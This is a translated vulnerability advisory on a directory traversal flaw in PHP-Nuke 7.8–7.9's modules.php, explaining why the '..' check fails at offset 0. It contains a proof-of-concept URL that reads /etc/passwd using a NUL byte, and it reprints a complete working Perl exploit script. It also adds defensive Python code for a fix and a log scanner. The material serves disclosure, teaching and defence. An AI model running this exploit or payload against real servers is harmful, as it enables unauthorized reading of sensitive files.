Security Vulnerabilities
PHP-Nuke modules.php Remote Directory Traversal Vulnerability

Published: 2005-10-20
Updated: 2005-10-20

Affected systems:
PHP-Nuke PHP-Nuke 7.9
PHP-Nuke PHP-Nuke 7.8
Description:
BUGTRAQ ID: 15137

PHP-Nuke is a widely used website creation and management tool that can use many database products as its back end, such as MySQL, PostgreSQL, mSQL, Interbase and Sybase.

PHP-Nuke contains a remote directory traversal vulnerability. A remote attacker can exploit it to read files outside the web root without authorization.

The vulnerable code is in modules.php:

---------------------------------
...
if (!isset($file) OR $file != $_REQUEST['file']) $file="index";
if (stripos_clone($file,"..") OR stripos_clone($mop,"..")) die("You are so cool...");
....
-----------------------------------

The function stripos_clone() is applied to the request variables $file and $mop to detect and block directory traversal: whenever the user supplies $file or $mop, the value is searched for "..".

However, stripos_clone() is defined in mainfile.php as follows:

--------
if(!function_exists('stripos')) {
function stripos_clone($haystack, $needle, $offset=0) {
return strpos(strtoupper($haystack), strtoupper($needle), $offset);
}
} else {

function stripos_clone($haystack, $needle, $offset=0) {
return stripos($haystack, $needle, $offset=0);
}
}
--------
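Both branches of stripos_clone() return the offset of the first match (0 when ".." is the very first thing in the string) or false when there is no match, so the `if` in modules.php is really testing the truthiness of an integer. The following Python block is an added example, not code from the advisory or from PHP-Nuke: it re-creates the check with the same return-value shape as PHP's strpos()/stripos(), so the truthiness test misbehaves in Python exactly as it does in PHP, and places the minimal fix (the PHP equivalent is `!== false`) and an allowlist fix next to it. The `modules/<name>/<file>.php` path in `effective_include_path()` is an assumption about how modules.php builds its include target; all sample inputs are constructed.

```python
import re

# Added example, not PHP-Nuke code: a Python re-creation of the modules.php
# check. PHP's strpos()/stripos() return the match offset, or false when the
# needle is absent; stripos_clone() below returns the same shape so that the
# truthiness test of the original `if` behaves identically here.


def stripos_clone(haystack, needle, offset=0):
    """Case-insensitive search mirroring PHP-Nuke's stripos_clone():
    the integer offset of the first match (0 is a real match), or False."""
    pos = haystack.upper().find(needle.upper(), offset)
    return False if pos == -1 else pos


def vulnerable_check(file, mop=""):
    """The original modules.php logic. True = request reaches the include,
    False = die() is reached. Bug: '..' at offset 0 yields 0, which `or`
    treats as false, so a value that starts with '..' is never rejected."""
    if stripos_clone(file, "..") or stripos_clone(mop, ".."):
        return False            # die("You are so cool...")
    return True


def fixed_check(file, mop=""):
    """Minimal fix: test for the no-match sentinel explicitly instead of
    relying on truthiness (PHP: stripos_clone($file, "..") !== false)."""
    if stripos_clone(file, "..") is not False or stripos_clone(mop, "..") is not False:
        return False
    return True


SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")


def allowlist_check(file, mop=""):
    """Stronger fix: accept only a bare module-file name. One positive rule
    rejects '/', '..', NUL bytes and percent-encoded variants alike, rather
    than enumerating bad substrings."""
    if SAFE_NAME.fullmatch(file) is None:
        return False
    return mop == "" or SAFE_NAME.fullmatch(mop) is not None


def effective_include_path(name, file):
    """ASSUMED include shape "modules/<name>/<file>.php". Emulates what the
    C-level open() saw on PHP builds that did not reject NUL bytes: the path
    is cut at the first NUL, so the appended '.php' never applies. This is
    why the PoC needs %00 and why magic_quotes_gpc must be Off (it would
    escape the NUL as \\0 and keep the suffix attached)."""
    built = f"modules/{name}/{file}.php"
    return built.split("\x00", 1)[0]


if __name__ == "__main__":
    # Constructed inputs: a normal request, the PoC payload, and a payload
    # with '..' in the middle (offset 4 is truthy, so even the original
    # check catches that one).
    for value in ("index", "../../../../etc/passwd\x00", "foo/../../etc/passwd"):
        print(repr(value), vulnerable_check(value), fixed_check(value), allowlist_check(value))
    print(effective_include_path("Search", "../../../../etc/passwd\x00"))
```

The same bypass applies through $mop, since both operands of the OR are evaluated the same way; the allowlist variant is the one to keep, because it also covers the NUL byte that the blacklist never looked for.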

Both definitions return the position of the first match, and a match at offset 0 returns the integer 0, which PHP's OR evaluates as false (no match returns false, also false). A $file value that begins with ".." therefore passes the check untouched. Requesting the following URL:

http://victim/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00

returns /etc/passwd from the server. The trailing %00 (a NUL byte) truncates the path when modules.php includes the file, so the .php suffix it appends is discarded; this only works with magic_quotes_gpc = Off, because magic quotes would escape the NUL.

An attacker who successfully exploits this vulnerability can therefore read sensitive information without authorization.

<*Source: sp3x (sp3x@securityreason.com)
  
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112974252124014&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

# SecurityReason Exploit Code
# by sp3x
# sp3x@securityreason.com
# www.securityreason.com
# Remote Directory Traversal Exploit - Local file include
# PHPNuke -> 7.8 full patched , 7.9 fullpatched + patch 3.1
# Server must have magic_quotes_gpc = Off - need to use %00
# Copyright (c) SecurityReason. All Rights Reserved.
#
# Example of usage : perl phpnuke-expl.pl 172.24.2.1 /nukedir/ Search ../../../etc/passwd

# Four arguments are required (host, nuke_dir, module, file).
if (@ARGV < 4)
{
print "\r\n";
print "SecurityReason - www.securityreason.com\r\n";
print "[sp3x] EXPLOIT for PHPNuke 7.8 - 7.9\r\n";
print " \r\n";
print "perl phpnuke-expl.pl [Host] [nuke_dir] [module] [file]\r\n\r\n";
print "[Host] - Host where is phpnuke example: http://localhost\r\n";
print "[nuke_dir] - Directory of PHPNuke example: /phpnuke/html/\r\n";
print "[module] - Module of PHPNuke example: News\r\n";
print "[file] - file to show - example : ../../../../../etc/passwd\r\n\r\n";
print "Example of usage : perl phpnuke-expl.pl 172.24.2.1 /nukedir/ Search ../../../../../etc/passwd";
print "\r\n";
exit();
}

my $HOST   = $ARGV[0];
my $DIR    = $ARGV[1]."modules.php";   # nuke_dir must end with "/"
my $MODULE = "?name=".$ARGV[2]."&";
my $FILE   = "file=".$ARGV[3]."%00";   # %00 cuts off the ".php" appended by modules.php
my $LENGTH = length $FILE;

print "\r\n[Host] : ".$HOST."\n";
print "[Dir] : ".$DIR."\n";
print "[Module] : ".$ARGV[2]."\n";
print "[File] : ".$ARGV[3]."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

my $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80" )
    || die "Cannot connect to ".$HOST.":80\r\n\r\n";

# Every header line is terminated with CRLF; the original script ran several
# headers together on one line.
print $get1 "GET ".$DIR.$MODULE.$FILE." HTTP/1.0\r\n";
print $get1 "Host: ".$HOST."\r\n";
print $get1 "User-Agent: Mozilla/5.0 - SecurityReason\r\n";
print $get1 "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $get1 "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n";
print $get1 "Accept-Encoding: gzip,deflate\r\n";
print $get1 "Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7\r\n";
print $get1 "Keep-Alive: 300\r\n";
print $get1 "Cookie: lang=english\r\n";
print $get1 "Cache-Control: max-age=0\r\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\r\n";
print $get1 "Content-Length: ".$LENGTH."\r\n\r\n";

# The payload is also sent as the request body (original behaviour).
print $get1 $FILE;

while (my $odp = <$get1>)
{
if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
print "\n\nFile ".$ARGV[3]." doesn't exist or something went wrong.\r\n\r\n";
exit;
}

# Plain print: the HTML body may contain '%' characters, which printf would
# interpret as format directives.
print $odp;
}
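For the defender, the request the exploit sends is easy to spot in web server logs once the query string is decoded. The following Python scanner is an added example, not from the advisory or from PHP-Nuke: it runs over constructed Apache combined-format lines and flags `file` or `mop` values on requests to modules.php that contain `..`, a NUL byte or an absolute path, after undoing percent-encoding (including double encoding). The log lines, field names and thresholds are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
# Line 1 is the advisory's PoC request, line 3 the same payload fully
# percent-encoded, line 4 traversal through the second checked parameter,
# $mop; lines 2 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2005:10:01:02 +0000] "GET /nuke/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1834 "-" "Mozilla/5.0 - SecurityReason"
10.0.0.6 - - [20/Oct/2005:10:01:03 +0000] "GET /nuke/modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Oct/2005:10:01:04 +0000] "GET /nuke/modules.php?name=Search&file=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1834 "-" "curl/7.15"
10.0.0.8 - - [20/Oct/2005:10:01:05 +0000] "GET /nuke/modules.php?name=Forums&file=viewtopic&mop=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 500 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Oct/2005:10:01:06 +0000] "GET /nuke/index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# The two request variables modules.php passes through stripos_clone().
WATCHED_PARAMS = ("file", "mop")


def fully_decode(value, rounds=3):
    """parse_qs already decodes once; decode again while the value still
    changes so double-encoded payloads (%252e%252e) are normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_indicators(value):
    """Return the reasons a decoded parameter value looks like traversal."""
    reasons = []
    if "\x00" in value:
        reasons.append("null_byte")
    if ".." in value:
        reasons.append("dot_dot")
    if value.startswith("/"):
        reasons.append("absolute_path")
    return reasons


def scan(log_text):
    """One finding per suspicious watched parameter on a modules.php request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/modules.php"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for raw in params.get(name, []):
                value = fully_decode(raw)
                reasons = traversal_indicators(value)
                if reasons:
                    findings.append({
                        "ip": m.group("ip"),
                        "ts": m.group("ts"),
                        "status": int(m.group("status")),
                        "param": name,
                        "value": value,
                        "reasons": reasons,
                    })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        # A 200 on a traversal request is the one to escalate: the file was served.
        print(f["ts"], f["ip"], f["status"], f["param"], repr(f["value"]), ",".join(f["reasons"]))
```

The status code is kept in each finding on purpose: a 200 with a body size matching a system file means the read succeeded, whereas a 404 or a PHP warning page indicates the attempt was blocked or missed its target.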

Recommendations:
Vendor patch:

PHP-Nuke
--------
A patch that fixes this security issue has been released and can be downloaded from:

http://securityreason.com/download/1/4

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.